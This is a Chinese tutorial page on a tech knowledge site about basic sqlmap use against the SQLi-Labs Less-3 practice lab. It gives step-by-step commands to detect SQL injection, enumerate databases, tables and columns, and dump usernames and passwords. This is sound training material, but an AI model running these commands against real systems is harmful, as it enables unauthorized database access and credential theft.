| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> SQLmap基础使用 -> 正文阅读 |
|
[PHP知识库]SQLmap基础使用 |
实验环境操作系统:Windows10安装的应用软件:Sqlmap、FireFox浏览器插件HackBar;Apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境实验步骤1.访问SQLi-Labs网站Less-3 http://靶机ip/sql/Less-3 登录后,根据网页提示,先给定一个GET参数: /http://靶机ip/sql/Less-3/?id=1 2.启动SQLmap 找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLmap: python sqlmap.py -h ?3.寻找注入点 输入命令自动寻找网站注入点,并获取网站及后台数据库的基本信息: python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1 检测结果: ?4.获取所有数据库的库名 (1)python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1 --dbs ?检测结果如下: ?(2)使用以下命令获取网站当前所在数据库的库名 python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 --current-db 检测结果如下图: 5.获取数据库中所有的表名 python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security --tables 检测结果如下图: ?6.获取users表中的全部字段名 sqlmap>python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security -T users --columns ?检测结果如下图: ?7.获取users表id、username、password字段的全部值 python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security -T users -C id,username,password --dump 检测结果如下图: ? |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/26 16:18:20- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |